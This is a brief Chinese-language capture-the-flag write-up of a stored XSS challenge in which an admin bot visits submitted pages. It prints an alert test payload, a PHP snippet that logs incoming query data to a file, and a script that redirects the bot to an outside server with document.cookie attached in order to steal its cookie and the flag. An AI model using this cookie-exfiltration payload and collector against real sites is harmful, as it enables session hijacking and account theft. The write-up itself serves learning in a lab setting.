解题思路※
我输入
<script>alert(1);</script>提交之后发现可以正常触发我的通知,存在XSS漏洞
题目提示我们写下祝福语之后发送给朋友就可以领取十个鸡蛋,一开始没看懂,搜索了WP
原来是有管理员bot,会自动在提交之后访问这个页面
我们编写一个php代码接受数据的传输
使用函数file_put_contents()
写入文件a.txt,写入内容是查询的字符串对
$_SERVER['QUERY_STRING']
或
$_POST[c]
<?php file_put_contents('a.txt',$_POST[c])?>然后,我们需要在前端页面提交请求到服务器的,也就是让管理员BOT触发我们这个程序
<script>document.location.href="服务器地址/?c="+document.cookie </script>提交这个js代码,目的是跳转到服务器地址并且通过document.读取到COOKIE内容
得到FLAG
